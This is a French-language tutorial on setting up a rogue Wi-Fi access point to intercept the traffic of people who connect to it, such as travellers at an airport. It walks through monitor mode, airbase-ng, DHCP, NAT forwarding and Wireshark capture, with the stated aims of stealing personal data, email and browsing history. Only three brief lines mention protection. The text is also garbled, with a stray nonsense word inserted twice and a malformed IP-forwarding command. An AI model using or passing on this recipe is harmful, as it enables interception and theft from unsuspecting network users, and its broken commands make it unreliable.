Tuto ROGUE AP emdehere

Comment créer un faux point d’accès ? Quelles vulnérabilité exploite-t-il et Comment on s’en protéger ?

PRÉSENTATION :
– « Faux » point d’accès sans fil (non-officiel)
– Connecté à un « vrais » réseau (officiel)
– Permettant de récupérer des informations personnelles
– Généré facilementu
– Deux type :
-Point accès escroc créé avec un nom diffèrent d’un point d’accès existant. (expliqué ici)
-Point d’accès illégitime créé en copiant les informations d’un point d’accès existant.

MISE EN SITUATION :
Un doctorant d’une institut de recherche part en déplacement pour assister à une conférence. Il doit prendre l’avion, pour cela, il se rend à l’aéroport. En attendant l’avion, il se connecte à un réseau wifi nommé « Free_Wifi ». Il regarde ses mails depuis Outlook. Pour travailler sur son mémoire, il récupère son travail sur son ordinateur en se connectant au serveur ftp de l’institut. A son retour, il découvrira son dossier ftp vide et des envoies de mails anormaux depuis son compte de messagerie.

OBJECTIFS :
Récupération d’informations personnelles
Récupération historique de navigation / emails …
Modification de trames Ethernet à la volée

Image1

CONFIGURATION REQUISE :
Une connexion internet
Un ordinateur / raspberry
Une clé wifi
Une distribution fragzing linux avec airbase-ng et wireshark ou équivalant

MISE EN PLACE :

La clé wifi :
Plusieurs modes sur un clé wifi :
Mode monitor : fait que la carte wifi reçoit tous le trafic réseau sans fil
Mode managed : fait que la carte wifi reçoit uniquement le trafic réseau sans fil qui lui est destiné

Pour changer de mode :
ifconfig wlan1 down : désactive la clé wifi
iwconfig wlan1 mode monitor : passe la clé wifi en mode monitor
ifconfig wlan1 up : active la clé wifi

Génération du point d’accès wifi avec airbase-ng :
airbase-ng -c [numéro de canal] -e ‘[nom du point d’accès]’ [interface d’accès]
Configuration de l’interface at0 :
ifconfig at0 up : activation de la nouvelle interface
ifconfig at0 10.255.255.254 netmask 255.0.0.0 : adressage statique interface at0

Nous utiliserons udhcpd pour mettre en place le dhcp :
Besoin :
Fichier de configuration
Fichier pour stocker les baux
Plage IP :
Réseau : 10.0.0.0/8
Passerelle : 10.255.255.254
Première adresse : 10.0.0.1
Maximum de client : 1000
Démarrage udhcpd :
udhcpd rogue_ap/udhcpd.conf : avec rogue_ap/udhcpd.conf chemin vers le fichier udhcpd.conf

Activer l’IP forwarding
echo > 1 /proc/sys/net/ipv4/ip_forward

Rediriger le traffic vers wlan0 (avec wlan0 l’interface connecté à internet)

iptables –t nat –A POSTROUTING –o wlan0 –j MASQUERADE

A partir de ce moment le point d’accès est actif, le dhcp mis en place et les postes connectés bénéficient d’un accès internet.

CAPTURE DES INFORMATIONS :
Avec Wireshark
Ou avec des applicatifs dédiés (sniffer)

S’EN PROTÉGER :
Ne pas se connecter sur des réseaux inconnus
Utiliser des protocoles fragzing de communication sécurisés
Passer par une connexion vpn (souvent fournit par l’entreprise)